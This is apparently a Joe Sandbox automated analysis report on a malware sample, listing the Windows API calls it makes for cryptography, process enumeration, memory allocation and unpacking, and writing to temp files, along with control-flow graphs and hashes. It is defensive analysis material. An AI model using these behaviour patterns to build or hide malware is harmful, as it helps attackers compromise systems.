                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 013F1E4B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 384183238-0
                                                                                                                                                                                                                                                          • Opcode ID: 695684b607c19f5658279606ea6fc3cae5d42b684ce664e1eb3697bf7d4888b8
                                                                                                                                                                                                                                                          • Instruction ID: dce233d1745c34b70ab84cf9fab679e1bc861e2bf3f4fdb864e7dbb6d368c012
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 695684b607c19f5658279606ea6fc3cae5d42b684ce664e1eb3697bf7d4888b8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641D8B5900219ABDB25EF68DD84FEEB7B9AB59304F0041DCE70DA6194DB30AA85CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 783 13f8bb0-13f8bc1 784 13f8ce7-13f8ced 783->784 785 13f8bc7-13f8bcb 783->785 785->784 786 13f8bd1-13f8bd5 785->786 786->784 787 13f8bdb-13f8bdf 786->787 787->784 788 13f8be5-13f8c07 CryptAcquireContextA 787->788 789 13f8c3e-13f8c42 788->789 790 13f8c09-13f8c19 GetLastError 788->790 789->784 793 13f8c48-13f8c61 CryptCreateHash 789->793 791 13f8c1b-13f8c22 790->791 792 13f8c24-13f8c38 CryptAcquireContextA 790->792 791->789 791->792 792->789 794 13f8cdb-13f8ce1 CryptReleaseContext 793->794 795 13f8c63-13f8c79 CryptHashData 793->795 794->784 796 13f8c7b-13f8ca1 CryptGetHashParam 795->796 797 13f8cd1-13f8cd5 CryptDestroyHash 795->797 796->797 798 13f8ca3-13f8ca9 796->798 797->794 798->797 799 13f8cab-13f8cc9 CryptGetHashParam 798->799 799->797 800 13f8ccb-13f8cce 799->800 800->797
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F8BFF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F8C09
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8C38
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013F8C59
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 013F8C71
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 013F8C99
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 013F8CC1
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 013F8CD5
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8CE1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F8C28
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F8BF0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                          • Opcode ID: ac9ae5c7de956373a9a4b5179f9a823d6bc81c7da39d7c14c5c490e8107cd8c3
                                                                                                                                                                                                                                                          • Instruction ID: b1fc97a50815e7871df53e886638bf8e9240a78abe9c10b86301c4a201a31293
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac9ae5c7de956373a9a4b5179f9a823d6bc81c7da39d7c14c5c490e8107cd8c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12411D71A4020EABEF24CF95C889FEFBBB8BB04708F14855DF711A6280D7B49545CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F8AD3
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F8ADD
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8B0C
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 013F8B37
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 013F8B5E
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 013F8B7A
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 013F8B87
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 013F8B91
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8B9D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F8AC4
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F8AFC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 2e20c64407f03613532fa5db1160f8e4d7e251ab497bab302d51afb3617cab99
                                                                                                                                                                                                                                                          • Instruction ID: aa63bb6c4d1bb5733d9e406ed67715c55a7c84d5948e4fc7bcb6ad63b2cbaf1c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e20c64407f03613532fa5db1160f8e4d7e251ab497bab302d51afb3617cab99
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831DDB1A4020DEFEB24CF99D849FEE7BB8BB48705F14855CF601A6284C7B49945CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013F48EB
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 013F490B
                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 013F493C
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 013F496F
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 013F4982
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 013F49A9
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 013F49CC
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 013F4A07
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 013F4A34
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 013F4A7D
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 013F4A8A
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F4AA5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2727466597-0
                                                                                                                                                                                                                                                          • Opcode ID: 5886e44415e2824d66f242de3cec6c72a92944439aa2d7eafec44c135c98b410
                                                                                                                                                                                                                                                          • Instruction ID: d1c8b4f32ccf904d6fefc24d335b1c2ace7a9648d17bb3644e5130c488a4f6fd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5886e44415e2824d66f242de3cec6c72a92944439aa2d7eafec44c135c98b410
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14511C71A40319ABEB25CB64CC84FEA777CAB48B04F04459CF709AA184DB75DB89CF64
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F89BF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F89C9
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F89F8
                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 013F8A1F
                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 013F8A41
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 013F8A4E
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8A5A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F89B0
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F89E8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 48eb55c2fc4c1d7df50d2201244ec14861b814697878d18e3376397f0f9177bb
                                                                                                                                                                                                                                                          • Instruction ID: fd420526b19ad153c6927eb09b78a6d1537a0b5aede0b37f78124bade37de62b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48eb55c2fc4c1d7df50d2201244ec14861b814697878d18e3376397f0f9177bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E31FA75A40209FFEF28CFA8C889FAE7BB9FB44705F14855CF605A6284C7B49684CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00FE6221
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,0063F02F,00003000,00000040), ref: 00FE6289
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00FE6350
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742772659.0000000000FE6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE6000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe6000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual$LibraryLoad
                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l$lloc
                                                                                                                                                                                                                                                          • API String ID: 2441068224-1161241244
                                                                                                                                                                                                                                                          • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                                                                                          • Instruction ID: 30d0496d87e97e03ca767d4175dc5af7ca33690b172541c52428b8042f2ec875
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 372257B1E002599FDB10CF9AC884AAEBBB5FF18350F248169E919EB345D770E941DF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000040), ref: 0050129B
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00501343
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocErrorLastVirtual
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 497505419-853226302
                                                                                                                                                                                                                                                          • Opcode ID: 0f98488ea55157360b7d8bcfb97a7dc75438cd77a0b156aa077d0dedc91b6df8
                                                                                                                                                                                                                                                          • Instruction ID: ca8582c98dfeb2ea3af5aa6484ff5ead308bcd201978bf7aa9878a32d3bbbe58
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f98488ea55157360b7d8bcfb97a7dc75438cd77a0b156aa077d0dedc91b6df8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E516875204701DFD704CF68D884FABBBE9FB89304F044A69E54ACB691D770E849CB66
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 013F97A0: GetProcessHeap.KERNEL32(00000008,013F9FB2,?,013F9FB2,00000000,?,?,?,013F9E2D), ref: 013F97A9
                                                                                                                                                                                                                                                            • Part of subcall function 013F97A0: RtlAllocateHeap.NTDLL(00000000,?,013F9FB2,00000000,?,?,?,013F9E2D), ref: 013F97B0
                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,013F9E2D), ref: 013F9FEB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1318000056-0
                                                                                                                                                                                                                                                          • Opcode ID: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                          • Instruction ID: a8e7af73cb4f6919e1aab0960e3c2b5a44a77653c6f9e7a9862e0e796457af26
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57311CB4E0020AEFDB04CF98D494BEEBBB5EF48308F10816DEA09A7350D735AA45CB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 298 13f62b0-13f62c4 299 13f6c4e 298->299 300 13f62ca-13f62ce 298->300 302 13f6c51-13f6c54 299->302 300->299 301 13f62d4-13f62e0 300->301 301->299 303 13f62e6-13f62ed 301->303 303->299 304 13f62f3-13f6314 303->304 306 13f642e-13f6453 304->306 307 13f631a-13f631e 304->307 314 13f6c2f-13f6c36 306->314 315 13f6459-13f645d 306->315 309 13f6343-13f6363 307->309 310 13f6320-13f633a 307->310 312 13f6429 309->312 313 13f6369-13f6375 309->313 310->309 311 13f633c-13f633e 310->311 311->302 312->306 313->312 318 13f637b-13f6384 313->318 316 13f6c38-13f6c42 314->316 317 13f6c44 314->317 319 13f645f-13f6479 315->319 320 13f6482-13f64a2 315->320 316->299 317->299 318->312 324 13f638a-13f6393 318->324 319->320 321 13f647b-13f647d 319->321 322 13f64a8-13f64b4 320->322 323 13f65f3-13f65fc 320->323 321->302 322->323 325 13f64ba-13f654c GetEnvironmentVariableA call 13f7d20 call 13f9730 GetTickCount GetTempFileNameA CreateFileA 322->325 326 13f65fe 323->326 327 13f6603-13f660f 323->327 324->312 328 13f6399-13f63a2 324->328 325->323 356 13f6552-13f6586 WriteFile 325->356 326->326 332 13f6bdd-13f6be9 327->332 333 13f6615-13f6621 327->333 329 13f63a4-13f63ca VirtualAlloc 328->329 330 13f6410-13f6424 call 13f1ee0 328->330 334 13f640e 329->334 335 13f63cc-13f63e4 call 13f6260 329->335 345 13f6427 330->345 336 13f6beb-13f6bf7 332->336 337 13f6c18-13f6c24 332->337 333->332 340 13f6627-13f6640 call 13f7250 333->340 334->345 353 13f63fd-13f6408 VirtualFree 335->353 354 13f63e6-13f63fa call 13f1ee0 335->354 336->337 342 13f6bf9-13f6c16 call 13fa360 336->342 343 13f6c2a 337->343 344 13f6c26 337->344 357 13f6647-13f664e 340->357 358 13f6642 340->358 342->343 343->343 344->343 345->306 353->334 354->353 362 13f65dd-13f65e4 356->362 363 13f6588-13f6591 356->363 359 13f6654-13f6674 VirtualAlloc 357->359 360 13f6752-13f675b 357->360 358->357 359->360 364 13f667a-13f6747 call 13f7b70 call 13f97a0 CreateThread CloseHandle 359->364 367 13f69ba-13f6a49 GetEnvironmentVariableA call 13f7d20 call 13f9730 GetTickCount GetTempFileNameA CreateFileA 360->367 368 13f6761-13f6788 360->368 362->323 365 13f65e6-13f65ed CloseHandle 362->365 363->362 369 13f6593-13f65c7 CloseHandle call 13f6c60 call 13f1e60 363->369 364->360 365->323 395 13f6a4f-13f6a75 367->395 396 13f6bd6 367->396 372 13f678e-13f67c0 VirtualAlloc 368->372 373 13f6858-13f6864 call 13f2070 368->373 393 13f65c9-13f65d0 call 13f74a0 ExitProcess 369->393 394 13f65d8 369->394 378 13f6856 372->378 379 13f67c6-13f67e7 call 13f6260 372->379 384 13f686a-13f6871 373->384 378->384 399 13f67e9-13f6807 call 13f2070 379->399 400 13f6842-13f6850 VirtualFree 379->400 390 13f6877-13f687e 384->390 391 13f69b0 384->391 397 13f6894-13f689d 390->397 398 13f6880-13f6891 call 13f73c0 390->398 391->367 394->362 405 13f65d8 call 13f6cf0 394->405 406 13f6b1e-13f6b3c WriteFile 395->406 407 13f6a7b-13f6aad VirtualAlloc 395->407 396->332 401 13f698a-13f6993 397->401 402 13f68a3-13f68c8 call 13f97a0 397->402 398->397 399->400 421 13f6809-13f683a VirtualAlloc call 13f7b70 399->421 400->378 414 13f69a9 401->414 415 13f6995-13f69a6 call 13f2510 401->415 425 13f68ca-13f68e7 402->425 426 13f68e9-13f690d VirtualAlloc 402->426 405->362 417 13f6b42-13f6b49 406->417 412 13f6aaf-13f6ad0 call 13f6260 407->412 413 13f6b1c 407->413 434 13f6b08-13f6b16 VirtualFree 412->434 435 13f6ad2-13f6b02 WriteFile 412->435 413->417 414->391 415->414 418 13f6b4b-13f6b57 417->418 419 13f6bc9-13f6bd0 CloseHandle 417->419 418->419 424 13f6b59-13f6b82 CloseHandle call 13f1e60 418->424 419->396 432 13f683f 421->432 439 13f6bc7 424->439 440 13f6b84-13f6b8b 424->440 431 13f6934-13f693d 425->431 426->431 433 13f690f-13f6931 call 13f7b70 426->433 431->401 438 13f693f-13f6984 CreateThread CloseHandle 431->438 432->400 433->431 434->413 435->434 438->401 439->396 442 13f6b8d-13f6b9e call 13f73c0 440->442 443 13f6ba1-13f6baa 440->443 442->443 445 13f6bac-13f6bbd call 13f2510 443->445 446 13f6bc0 443->446 445->446 446->439
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 013F63BD
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 013F6408
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                          • String ID: Balucergobw$TEMP$TEMP
                                                                                                                                                                                                                                                          • API String ID: 2087232378-2855258202
                                                                                                                                                                                                                                                          • Opcode ID: 4871eb1c221b4cd1ef4cf13d3848292ab64bec836d34845c65df2102250d0d1c
                                                                                                                                                                                                                                                          • Instruction ID: 074e516e23e0e9d7b7d880a6d4769faebaf7cf2932dd444efaefd17c916c2247
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4871eb1c221b4cd1ef4cf13d3848292ab64bec836d34845c65df2102250d0d1c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71523CB4A00219DFDB24DF98DC89FAEB7B5FB48304F14859CE609A7284D770AA81CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 013F4066
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 013F407A
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 013F40AF
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F40C6
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 013F40E6
                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 013F40F7
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 013F4101
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,013F4AC0,00000000,00000000,00000000), ref: 013F4118
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 013F41DD
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,013F4BA0,?,00000000,00000000), ref: 013F41F7
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 013F420C
                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 013F4216
                                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 013F422D
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 013F423C
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 013F4258
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 013F426D
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 013F4277
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 013F428E
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 013F42A6
                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 013F42D1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1593741596-0
                                                                                                                                                                                                                                                          • Opcode ID: 60a82f0ea1d71e578f05e6d809e4dfbfca7f553879f9d05b4bac5b3e7e4f3c43
                                                                                                                                                                                                                                                          • Instruction ID: ef4cb3460deb480c847a0fbb919e8a65d10b8a561fc0331a6e77408427c2dacc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60a82f0ea1d71e578f05e6d809e4dfbfca7f553879f9d05b4bac5b3e7e4f3c43
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC911774A4030DAFEB14DFA4D889FEEBBB5BB48308F10811DFA05AB284DB759955CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
